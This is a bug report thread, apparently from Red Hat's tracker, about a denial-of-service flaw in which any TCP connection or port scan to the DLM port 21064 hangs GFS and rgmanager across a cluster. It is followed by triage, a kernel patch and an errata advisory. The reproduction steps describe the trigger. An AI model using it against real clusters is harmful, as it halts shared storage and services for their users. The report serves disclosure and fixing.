Opening a tcp connection from a cluster member to another cluster member targeting the dlm port it is enough to stop every dlm operation in the cluster. This means that GFS and rgmanager will hangs. 1. telnet from a member of the cluster to another member of the cluster targeting port 21064 2. Try to write to a mounted gfs filesystem The write operation hangs and every following operation (read or write) on the GFS filesystem on every node hangs. Every service that use DLM seems to stop working. Rgmanager stop to works with a "Unable to obtain cluster lock: Connection timed out" error message. Even a zero data connection, like a TCP port scan is enough to stop DLM operations on the whole cluster
This request was evaluated by Red Hat Product Management for inclusion in a Red Hat Enterprise Linux maintenance release. Product Management has requested further review of this request by Red Hat Engineering, for potential inclusion in a Red Hat Enterprise Linux Update release for currently deployed products. This request is not yet committed for inclusion in an Update release.
why are we wasting our time with this bz? *** This bug has been marked as a duplicate of 245892 ***
OK, patch posted to you and rhkernel-list.
A patch for this issue has been included in build 2.6.18-8.1.15
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0940.html